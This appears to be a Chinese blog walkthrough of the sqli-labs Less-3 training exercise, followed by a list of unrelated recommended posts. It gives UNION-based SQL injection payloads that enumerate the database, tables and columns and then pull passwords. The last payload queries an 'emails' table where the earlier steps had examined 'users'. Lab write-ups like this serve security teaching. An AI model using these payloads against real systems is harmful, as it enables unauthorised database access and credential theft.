Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
曹牧3 小时前
Oracle:前缀匹配之REGEXP_LIKE
数据库·oracle
暴躁小师兄数据学院5 小时前
【AI大数据工程师特训笔记】第05讲:关联查询
数据库·sql·oracle
倔强的石头_5 小时前
《Kingbase护城河》——跨平台环境下的数据库联调实战
数据库
lzhdim5 小时前
SQL 入门 17:MySQL 数据类型:从字符串到 JSON 的全面解析
数据库·sql·mysql·json
杨云龙UP6 小时前
Oracle RAC / ODA 生产环境指定 PDB 启动 SOP
linux·运维·数据库·oracle
kingwebo'sZone6 小时前
在Cent上安装Mysql 8.0的遇到的问题和解决办法
数据库·mysql·adb
幽络源小助理6 小时前
最新知识付费系统网站源码 PC+H5双端 附安装教程 – 幽络源源码网
大数据·数据库
小白考证进阶中6 小时前
Oracle OCP证书报考&考试全指南
数据库·oracle·oracle ocp·ocp认证·oracle认证·甲骨文认证·oracle ocp题库
Leon-Ning Liu7 小时前
【真实经验分享】 ORA-600 [qesmaGetTblSeg1]
数据库·oracle
与数据交流的路上7 小时前
MySQL 优化 -- 相关
数据库·mysql
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06【AI】2026 年具身智能模型和世界模型总结07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10几个好用的ip纯净度检测网站